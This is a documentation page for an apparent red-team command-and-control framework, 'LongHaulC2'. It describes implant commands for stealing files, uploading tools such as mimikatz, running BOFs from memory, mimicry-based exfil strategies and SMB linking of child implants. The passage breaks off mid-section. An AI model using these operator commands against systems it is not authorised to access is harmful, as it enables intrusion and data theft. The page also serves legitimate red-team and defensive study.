<!doctype html>
<html lang="en" dir="ltr" class="docs-wrapper plugin-docs plugin-id-default docs-version-current docs-doc-page docs-doc-id-02 Implants/Commands" data-has-hydrated="false">
<head>
<meta charset="UTF-8">
<meta name="generator" content="Docusaurus v3.10.1">
<title data-rh="true">Commands | LongHaulC2</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:url" content="https://longhaulc2.github.io/02 Implants/Commands"><meta data-rh="true" property="og:locale" content="en"><meta data-rh="true" name="docusaurus_locale" content="en"><meta data-rh="true" name="docsearch:language" content="en"><meta data-rh="true" name="docusaurus_version" content="current"><meta data-rh="true" name="docusaurus_tag" content="docs-default-current"><meta data-rh="true" name="docsearch:version" content="current"><meta data-rh="true" name="docsearch:docusaurus_tag" content="docs-default-current"><meta data-rh="true" property="og:title" content="Commands | LongHaulC2"><meta data-rh="true" name="description" content="This document outlines the available commands for the implant, grouped by functionality."><meta data-rh="true" property="og:description" content="This document outlines the available commands for the implant, grouped by functionality."><link data-rh="true" rel="canonical" href="https://longhaulc2.github.io/02 Implants/Commands"><link data-rh="true" rel="alternate" href="https://longhaulc2.github.io/02 Implants/Commands" hreflang="en"><link data-rh="true" rel="alternate" href="https://longhaulc2.github.io/02 Implants/Commands" hreflang="x-default"><script data-rh="true" type="application/ld+json">{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Commands","item":"https://longhaulc2.github.io/02 Implants/Commands"}]}</script><link rel="stylesheet" href="/assets/css/styles.f215c5ed.css">
<script src="/assets/js/runtime~main.d89bb85e.js" defer="defer"></script>
<script src="/assets/js/main.6faddac6.js" defer="defer"></script>
</head>
<body>
<svg style="display: none;"><defs>
<symbol id="theme-svg-external-link" viewBox="0 0 24 24"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"/></symbol>
</defs></svg>
<script>!function(){var t=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return window.localStorage.getItem("theme")}catch(t){}}();document.documentElement.setAttribute("data-theme",t||"dark"),document.documentElement.setAttribute("data-theme-choice",t||"dark")}(),function(){try{const c=new URLSearchParams(window.location.search).entries();for(var[t,e]of c)if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}()</script><div id="__docusaurus"><div role="region" aria-label="Skip to main content"><a class="skipToContent_fXgn" href="#__docusaurus_skipToContent_fallback">Skip to main content</a></div><nav aria-label="Main" class="theme-layout-navbar navbar navbar--fixed-top"><div class="navbar__inner"><div class="theme-layout-navbar-left navbar__items"><button aria-label="Toggle navigation bar" aria-expanded="false" class="navbar__toggle clean-btn" type="button"><svg width="30" height="30" viewBox="0 0 30 30" aria-hidden="true"><path stroke="currentColor" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" d="M4 7h22M4 15h22M4 23h22"></path></svg></button><a class="navbar__brand" href="/"><b class="navbar__title text--truncate">LongHaulC2</b></a><a aria-current="page" class="navbar__item navbar__link navbar__link--active" href="/">Docs</a></div><div class="theme-layout-navbar-right navbar__items navbar__items--right"><a href="https://github.com/LongHaulC2/LongHaulC2" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link">GitHub<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a><div class="toggle_vylO colorModeToggle_DEke"><button class="clean-btn toggleButton_gllP toggleButtonDisabled_aARS" type="button" disabled="" title="system mode" aria-label="Switch between dark and light mode (currently system mode)"><svg viewBox="0 0 24 24" width="24" height="24" aria-hidden="true" class="toggleIcon_g3eP lightToggleIcon_pyhR"><path fill="currentColor" d="M12,9c1.65,0,3,1.35,3,3s-1.35,3-3,3s-3-1.35-3-3S10.35,9,12,9 M12,7c-2.76,0-5,2.24-5,5s2.24,5,5,5s5-2.24,5-5 S14.76,7,12,7L12,7z M2,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S1.45,13,2,13z M20,13l2,0c0.55,0,1-0.45,1-1 s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S19.45,13,20,13z M11,2v2c0,0.55,0.45,1,1,1s1-0.45,1-1V2c0-0.55-0.45-1-1-1S11,1.45,11,2z M11,20v2c0,0.55,0.45,1,1,1s1-0.45,1-1v-2c0-0.55-0.45-1-1-1C11.45,19,11,19.45,11,20z M5.99,4.58c-0.39-0.39-1.03-0.39-1.41,0 c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0s0.39-1.03,0-1.41L5.99,4.58z M18.36,16.95 c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41 L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41 s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06 c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L7.05,18.36z"></path></svg><svg viewBox="0 0 24 24" width="24" height="24" aria-hidden="true" class="toggleIcon_g3eP darkToggleIcon_wfgR"><path fill="currentColor" d="M9.37,5.51C9.19,6.15,9.1,6.82,9.1,7.5c0,4.08,3.32,7.4,7.4,7.4c0.68,0,1.35-0.09,1.99-0.27C17.45,17.19,14.93,19,12,19 c-3.86,0-7-3.14-7-7C5,9.07,6.81,6.55,9.37,5.51z M12,3c-4.97,0-9,4.03-9,9s4.03,9,9,9s9-4.03,9-9c0-0.46-0.04-0.92-0.1-1.36 c-0.98,1.37-2.58,2.26-4.4,2.26c-2.98,0-5.4-2.42-5.4-5.4c0-1.81,0.89-3.42,2.26-4.4C12.92,3.04,12.46,3,12,3L12,3z"></path></svg><svg viewBox="0 0 24 24" width="24" height="24" aria-hidden="true" class="toggleIcon_g3eP systemToggleIcon_QzmC"><path fill="currentColor" d="m12 21c4.971 0 9-4.029 9-9s-4.029-9-9-9-9 4.029-9 9 4.029 9 9 9zm4.95-13.95c1.313 1.313 2.05 3.093 2.05 4.95s-0.738 3.637-2.05 4.95c-1.313 1.313-3.093 2.05-4.95 2.05v-14c1.857 0 3.637 0.737 4.95 2.05z"></path></svg></button></div><div class="navbarSearchContainer_Bca1"></div></div></div><div role="presentation" class="navbar-sidebar__backdrop"></div></nav><div id="__docusaurus_skipToContent_fallback" class="theme-layout-main main-wrapper mainWrapper_z2l0"><div class="docsWrapper_hBAB"><button aria-label="Scroll back to top" class="clean-btn theme-back-to-top-button backToTopButton_sjWU" type="button"></button><div class="docRoot_UBD9"><aside class="theme-doc-sidebar-container docSidebarContainer_YfHR"><div class="sidebarViewport_aRkj"><div class="sidebar_njMd"><nav aria-label="Docs sidebar" class="menu thin-scrollbar menu_SIkG"><ul class="theme-doc-sidebar-menu menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item"><a class="menu__link" href="/"><span title="LongHaul C2 - Overview" class="linkLabel_WmDU">LongHaul C2 - Overview</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item"><a class="menu__link" href="/LongHaul C2 - Quickstart Guide"><span title="Quickstart Guide" class="linkLabel_WmDU">Quickstart Guide</span></a></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/00 Intro/Beaconing"><span title="Intro" class="categoryLinkLabel_W154">Intro</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/01 Listeners/Overview"><span title="Listeners" class="categoryLinkLabel_W154">Listeners</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/06 Network Profiles/Opsec"><span title="Mimicry" class="categoryLinkLabel_W154">Mimicry</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role="button" aria-expanded="true" href="/02 Implants/Commands"><span title="Implants" class="categoryLinkLabel_W154">Implants</span></a></div><ul class="menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link menu__link--active" aria-current="page" tabindex="0" href="/02 Implants/Commands"><span title="Commands" class="linkLabel_WmDU">Commands</span></a></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/02 Implants/Modules/Overview &amp; Modifications"><span title="Modules" class="categoryLinkLabel_W154">Modules</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/02 Implants/Systems/MemStore"><span title="Systems" class="categoryLinkLabel_W154">Systems</span></a></div></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/03 Scripting/Overview"><span title="Automation" class="categoryLinkLabel_W154">Automation</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/04 API Reference/Overview"><span title="Dev &amp; Advanced" class="categoryLinkLabel_W154">Dev &amp; Advanced</span></a></div></li></ul></nav></div></div></aside><main class="docMainContainer_TBSr"><div class="container padding-top--md padding-bottom--lg"><div class="row"><div class="col docItemCol_VOVn"><div class="docItemContainer_Djhp"><article><nav class="theme-doc-breadcrumbs breadcrumbsContainer_Z_bl" aria-label="Breadcrumbs"><ul class="breadcrumbs"><li class="breadcrumbs__item"><a aria-label="Home page" class="breadcrumbs__link" href="/"><svg viewBox="0 0 24 24" class="breadcrumbHomeIcon_YNFT"><path d="M10 19v-5h4v5c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-7h1.7c.46 0 .68-.57.33-.87L12.67 3.6c-.38-.34-.96-.34-1.34 0l-8.36 7.53c-.34.3-.13.87.33.87H5v7c0 .55.45 1 1 1h3c.55 0 1-.45 1-1z" fill="currentColor"></path></svg></a></li><li class="breadcrumbs__item"><span class="breadcrumbs__link">Implants</span></li><li class="breadcrumbs__item breadcrumbs__item--active"><span class="breadcrumbs__link">Commands</span></li></ul></nav><div class="tocCollapsible_ETCw theme-doc-toc-mobile tocMobile_ITEo"><button type="button" class="clean-btn tocCollapsibleButton_TO0P">On this page</button></div><div class="theme-doc-markdown markdown"><header><h1>Commands</h1></header>
<p>This document outlines the available commands for the implant, grouped by functionality.</p>
<hr>
<blockquote>
<p><strong>WARNING: Windows paths require double backslashes (<code>\\</code>).</strong> The command parser uses <code>\</code> as a delimiter. A single backslash will be consumed by the parser, mangling your path. Always write <code>C:\\Users\\</code> not <code>C:\Users\</code>.</p>
<p><strong>Wrong:</strong> <code>file download C:\Users\user\secrets.txt</code></p>
<p><strong>Right:</strong> <code>file download C:\\Users\\user\\secrets.txt</code></p>
</blockquote>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="command-tree">Command Tree<a href="#command-tree" class="hash-link" aria-label="Direct link to Command Tree" title="Direct link to Command Tree" translate="no">​</a></h2>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#F8F8F2;--prism-background-color:#282A36"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#F8F8F2;background-color:#282A36"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#F8F8F2"><span class="token plain">------</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">System</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">------</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">exit                 : Exit the implant. Kills the implant process on the host.</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">sleep                : Sleep for a specified number of seconds. Ex: `sleep 5`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain" style="display:inline-block"></span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">-----------</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">File System</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">-----------</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">cd                   : Change the current working directory. Ex: `cd C:\\Users\\`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">ls                   : List the contents of a directory. Ex: `ls C:\\Users\\`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">file download        : Download a file from the host. Ex: `file download C:\\Users\\user\\file.txt`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">file upload          : Upload a file to the host. Ex: `file upload C:\\Temp\\file.txt &lt;base64_contents&gt;`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">                       From filestore: `file upload C:\\Temp\\file.txt fs:filename`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain" style="display:inline-block"></span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">------------</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">Memory Store</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">------------</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">memstore list        : List all file names in the memstore. Ex: `memstore list`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">memstore upload      : Upload a file to the implant memstore. Ex: `memstore upload &lt;file_name&gt; &lt;base64_contents&gt;`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">                       From filestore: `memstore upload &lt;file_name&gt; fs:filename`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">memstore download    : Download a file from the implant memory store. Ex: `memstore download &lt;file_name&gt;`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">memstore delete      : Delete a file from the implant&#x27;s memory store. Ex: `memstore delete &lt;file_name&gt;`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">memstore clear       : Clear *all* files in the implant&#x27;s memory store. Ex: `memstore clear`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain" style="display:inline-block"></span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">-----------</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">C2 Strategy</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">-----------</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">strat active         : Show the currently active GET and POST strategies.</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">strat list           : List all strategies compiled into the implant.</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">strat set post       : Set the POST (exfil) strategy. Ex: `strat set post raw_60_1_1_1_80_HTTP_Mimicry`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">strat set get        : Set the GET (tasking) strategy. Ex: `strat set get raw_60_1_1_1_80_HTTP_Mimicry`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">strat set both       : Set GET and POST to one profile, or set them individually in one command.</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">                       Ex (same profile for both): `strat set both raw_60_1_1_1_80_HTTP_Mimicry`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">                       Ex (split profile):         `strat set both raw_get_name raw_post_name`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain" style="display:inline-block"></span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">---------</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">Execution</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">---------</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">bof                  : Run a BOF from base64, memstore, or filestore. Ex: `bof &lt;base64_bof&gt; [args]`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">                       From memstore: `bof *my_bof_in_memstore [args]`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">                       From filestore: `bof fs:my_bof_in_filestore [args]`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain" style="display:inline-block"></span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">-----------</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">SMB Linking</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">-----------</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">link smb             : Link to a child implant via SMB named pipes.</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">                       Ex: `link smb &lt;target_host&gt; &lt;inbox_pipe&gt; &lt;outbox_pipe&gt;`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">link list            : List all implants currently linked as children.</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">unlink smb           : Sever the SMB link to a child implant. Ex: `unlink smb &lt;child_uuid&gt;`</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain" style="display:inline-block"></span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">--------</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">Terminal</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">--------</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">help                 : Display this help menu.</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">history              : Show the task history for this implant (client-side, pulls from server).</span><br></div><div class="token-line" style="color:#F8F8F2"><span class="token plain">clear                : Clear the terminal output.</span><br></div></code></pre></div></div>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="a-note-on-command-outputs">A Note on Command Outputs<a href="#a-note-on-command-outputs" class="hash-link" aria-label="Direct link to A Note on Command Outputs" title="Direct link to A Note on Command Outputs" translate="no">​</a></h2>
<p>Every response from the implant is broken into at least three distinct fields rather than a single text blob:</p>
<p><code>data</code>: The raw payload returned by the command (e.g., file listing, file contents, BOF output).</p>
<p><code>message</code>: A human-readable status string translated from the Windows error code via <code>FormatMessage</code>.</p>
<ul>
<li class="">Ex: <code>ERROR_SUCCESS (0)</code> → <code>&quot;Success&quot;</code></li>
<li class="">Ex: <code>5</code> → <code>&quot;Access Denied&quot;</code></li>
<li class="">See <a href="https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-formatmessage" target="_blank" rel="noopener noreferrer" class="">FormatMessage (winbase.h)</a></li>
</ul>
<p><code>windows_error_code</code>: The raw numeric Windows API error code, useful for programmatic handling.</p>
<ul>
<li class="">See <a href="https://learn.microsoft.com/en-us/windows/win32/debug/system-error-codes--0-499-" target="_blank" rel="noopener noreferrer" class="">System Error Codes (0-499)</a></li>
</ul>
<p>Some commands return additional fields. These are noted in the individual command sections below (e.g., <code>strat active</code> returns <code>comms_get_strategy</code> and <code>comms_post_strategy</code>).</p>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="0-special-prefixes">0. Special Prefixes<a href="#0-special-prefixes" class="hash-link" aria-label="Direct link to 0. Special Prefixes" title="Direct link to 0. Special Prefixes" translate="no">​</a></h2>
<p>These prefixes are <strong>not</strong> normal arguments — they trigger special resolution behavior with certain commands. They are supported on commands that accept binary input: <code>file upload</code>, <code>bof</code>, and <code>memstore upload</code>.</p>
<table><thead><tr><th>Prefix</th><th>Meaning</th><th>Where data comes from</th></tr></thead><tbody><tr><td><code>*</code></td><td>Dereference — load data from the implant&#x27;s <strong>memory store</strong> by name</td><td>Implant-side (already uploaded via <code>memstore upload</code>)</td></tr><tr><td><code>fs:</code></td><td>Filestore fetch — load data from the <strong>server filestore</strong> by name</td><td>Server-side (uploaded via the Filestore page or auto-captured from <code>file download</code>)</td></tr></tbody></table>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="the-dereference-operator-">The Dereference Operator (<code>*</code>)<a href="#the-dereference-operator-" class="hash-link" aria-label="Direct link to the-dereference-operator-" title="Direct link to the-dereference-operator-" translate="no">​</a></h3>
<p>The <code>*</code> prefix pulls data from the implant&#x27;s in-memory store. The file must already exist on the implant (via <code>memstore upload</code>). No data is transferred from the server, the implant reads from its own memory.</p>
<p><strong>Syntax:</strong></p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#F8F8F2;--prism-background-color:#282A36"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#F8F8F2;background-color:#282A36"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#F8F8F2"><span class="token plain">&lt;command&gt; *&lt;memstore_name&gt; [other args...]</span><br></div></code></pre></div></div>
<p><strong>Examples:</strong></p>
<p>Traditional upload (sends bytes over the wire each time):</p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#F8F8F2;--prism-background-color:#282A36"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#F8F8F2;background-color:#282A36"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#F8F8F2"><span class="token plain">file upload C:\\Temp\\not_malware.exe &lt;base64_blob&gt;</span><br></div></code></pre></div></div>
<p>Dereferenced upload (pulls from memory store, no re-transfer needed):</p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#F8F8F2;--prism-background-color:#282A36"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#F8F8F2;background-color:#282A36"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#F8F8F2"><span class="token plain">file upload C:\\Temp\\not_malware.exe *my_payload</span><br></div></code></pre></div></div>
<p>BOF from memstore:</p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#F8F8F2;--prism-background-color:#282A36"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#F8F8F2;background-color:#282A36"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#F8F8F2"><span class="token plain">bof *arp.x64.o</span><br></div></code></pre></div></div>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="the-filestore-prefix-fs">The Filestore Prefix (<code>fs:</code>)<a href="#the-filestore-prefix-fs" class="hash-link" aria-label="Direct link to the-filestore-prefix-fs" title="Direct link to the-filestore-prefix-fs" translate="no">​</a></h3>
<p>The <code>fs:</code> prefix pulls data from the server&#x27;s filestore. The file is fetched by name, resolved to bytes, and sent to the implant as if you had pasted the base64 yourself. This is a <strong>client-side convenience</strong>, the implant never sees the <code>fs:</code> prefix.</p>
<p>Files get into the filestore two ways:</p>
<ol>
<li class=""><strong>Manual upload</strong> — via the Filestore page in the UI</li>
<li class=""><strong>Auto-capture</strong> — <code>file download</code> results are automatically saved to the filestore by the server&#x27;s response pipeline</li>
</ol>
<p><strong>Syntax:</strong></p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#F8F8F2;--prism-background-color:#282A36"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#F8F8F2;background-color:#282A36"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#F8F8F2"><span class="token plain">&lt;command&gt; fs:&lt;filestore_filename&gt; [other args...]</span><br></div></code></pre></div></div>
<p><strong>Examples:</strong></p>
<p>Upload a file from the server filestore to the target host:</p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#F8F8F2;--prism-background-color:#282A36"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#F8F8F2;background-color:#282A36"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#F8F8F2"><span class="token plain">file upload C:\\Temp\\mimikatz.exe fs:mimikatz.exe</span><br></div></code></pre></div></div>
<p>Run a BOF from the server filestore:</p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#F8F8F2;--prism-background-color:#282A36"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#F8F8F2;background-color:#282A36"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#F8F8F2"><span class="token plain">bof fs:arp.x64.o</span><br></div></code></pre></div></div>
<p>Stage a tool in the implant&#x27;s memory store from the server filestore:</p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#F8F8F2;--prism-background-color:#282A36"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#F8F8F2;background-color:#282A36"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#F8F8F2"><span class="token plain">memstore upload my_tool.exe fs:my_tool.exe</span><br></div></code></pre></div></div>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="fs-vs---when-to-use-which"><code>fs:</code> vs <code>*</code> — when to use which<a href="#fs-vs---when-to-use-which" class="hash-link" aria-label="Direct link to fs-vs---when-to-use-which" title="Direct link to fs-vs---when-to-use-which" translate="no">​</a></h3>
<table><thead><tr><th>Scenario</th><th>Use</th><th>Why</th></tr></thead><tbody><tr><td>One-shot BOF execution</td><td><code>fs:</code></td><td>No need to persist in implant memory</td></tr><tr><td>Repeated BOF execution</td><td><code>*</code></td><td>Transfer once to memstore, run many times without re-transfer</td></tr><tr><td>Upload file to disk</td><td><code>fs:</code> or <code>*</code></td><td><code>fs:</code> if file is only on the server; <code>*</code> if already in memstore</td></tr><tr><td>Stage a tool for later</td><td><code>memstore upload ... fs:name</code></td><td>Pulls from server filestore into implant memory store</td></tr></tbody></table>
<p><strong>Common pattern:</strong> <code>memstore upload tool.exe fs:tool.exe</code> (server → implant memory), then <code>bof *tool.exe</code> (run from memory, no transfer).</p>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="1-system-commands">1. System Commands<a href="#1-system-commands" class="hash-link" aria-label="Direct link to 1. System Commands" title="Direct link to 1. System Commands" translate="no">​</a></h2>
<p>Control the state and execution of the implant process itself.</p>
<table><thead><tr><th>Command</th><th>Description</th></tr></thead><tbody><tr><td><code>exit</code></td><td>Terminate the implant process on the host.</td></tr><tr><td><code>sleep</code></td><td>Update the implant&#x27;s sleep interval.</td></tr></tbody></table>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="exit"><code>exit</code><a href="#exit" class="hash-link" aria-label="Direct link to exit" title="Direct link to exit" translate="no">​</a></h3>
<p>Kills the implant process on the host. No response is returned.</p>
<ul>
<li class=""><strong>Usage:</strong> <code>exit</code></li>
</ul>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="sleep"><code>sleep</code><a href="#sleep" class="hash-link" aria-label="Direct link to sleep" title="Direct link to sleep" translate="no">​</a></h3>
<p>Updates the implant&#x27;s sleep interval to the given number of seconds.</p>
<ul>
<li class=""><strong>Usage:</strong> <code>sleep &lt;seconds&gt;</code></li>
<li class=""><strong>Example:</strong> <code>sleep 60</code></li>
</ul>
<p><strong>Return Values</strong></p>
<table><thead><tr><th>Field</th><th>Value</th></tr></thead><tbody><tr><td><code>data</code></td><td>The updated sleep interval (as a string)</td></tr><tr><td><code>message</code></td><td>Windows error message</td></tr><tr><td><code>windows_error_code</code></td><td>Resulting Windows error code</td></tr></tbody></table>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="2-file-system-operations">2. File System Operations<a href="#2-file-system-operations" class="hash-link" aria-label="Direct link to 2. File System Operations" title="Direct link to 2. File System Operations" translate="no">​</a></h2>
<p>Interact with files on the host&#x27;s disk.</p>
<table><thead><tr><th>Command</th><th>Description</th></tr></thead><tbody><tr><td><code>cd</code></td><td>Change the current working directory.</td></tr><tr><td><code>ls</code></td><td>List directory contents.</td></tr><tr><td><code>file download</code></td><td>Pull a file from the host to the server.</td></tr><tr><td><code>file upload</code></td><td>Push a file from the server to the host.</td></tr></tbody></table>
<hr>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="cd"><code>cd</code><a href="#cd" class="hash-link" aria-label="Direct link to cd" title="Direct link to cd" translate="no">​</a></h3>
<p>Changes the current working directory on the host.</p>
<ul>
